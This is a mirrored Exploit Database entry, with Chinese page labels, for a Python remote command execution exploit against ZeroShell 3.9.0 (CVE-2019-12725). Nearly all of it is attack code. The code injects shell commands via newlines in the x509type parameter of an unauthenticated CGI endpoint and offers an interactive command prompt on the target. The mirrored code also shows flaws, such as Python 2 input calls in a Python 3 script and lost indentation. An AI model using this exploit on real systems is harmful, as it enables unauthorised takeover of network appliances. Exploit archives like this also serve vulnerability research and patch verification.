ZeroShell 3.9.0 – Remote Command Execution

• Exploit Database
• 34 阅读

• 作者： Fellipe Oliveira
  日期： 2021-05-13
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/49862/

• # Exploit Title: ZeroShell 3.9.0 - Remote Command Execution 
  # Date: 10/05/2021
  # Exploit Author: Fellipe Oliveira
  # Vendor Homepage: https://zeroshell.org/
  # Software Link: https://zeroshell.org/download/
  # Version: < 3.9.0 
  # Tested on: ZeroShell 3.9.0
  # CVE : CVE-2019-12725
  
  #!/usr/bin/python3
  
  import requests
  import optparse
  import time
  
  parser = optparse.OptionParser()
  parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')
  
  options, args = parser.parse_args()
  if not options.url:
  print('[+] Specify an url target')
  print('[+] Example usage: exploit.py -u http://target-uri/')
  print('[+] Example help usage: exploit.py -h')
  exit()
  
  uri_zeroshell = options.url
  session = requests.Session()
  
  def command():
  try:
  check = session.get(uri_zeroshell + "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0Aid%0A'")
  if check.status_code == 200:
  flag = True
  print('[+] ZeroShell 3.9.0 Remote Command Execution')
  time.sleep(1)
  print('[+] Success connect to target')
  time.sleep(1)
  print('[+] Trying to execute command in ZeroShell OS...\n')
  time.sleep(1)
  check.raise_for_status()
  
  while flag:
  cmd = raw_input("$ ")
  payload = "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A" + cmd + "%0A'"
  uri_vuln = uri_zeroshell + payload
  burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
  res = session.get(uri_vuln, headers=burp0_headers, verify=False)
  print(res.text[:res.text.rindex("<html>") / 2])
  
  except requests.exceptions.ConnectionError as err:
  print('[x] Failed to Connect in: '+uri_zeroshell+' ')
  print('[x] This host seems to be Down')
  exit()
  except requests.exceptions.HTTPError as conn:
  print('[x] Failed to execute command in: '+uri_zeroshell+' ')
  print('[x] This host does not appear to be a ZeroShell')
  exit()
  
  command()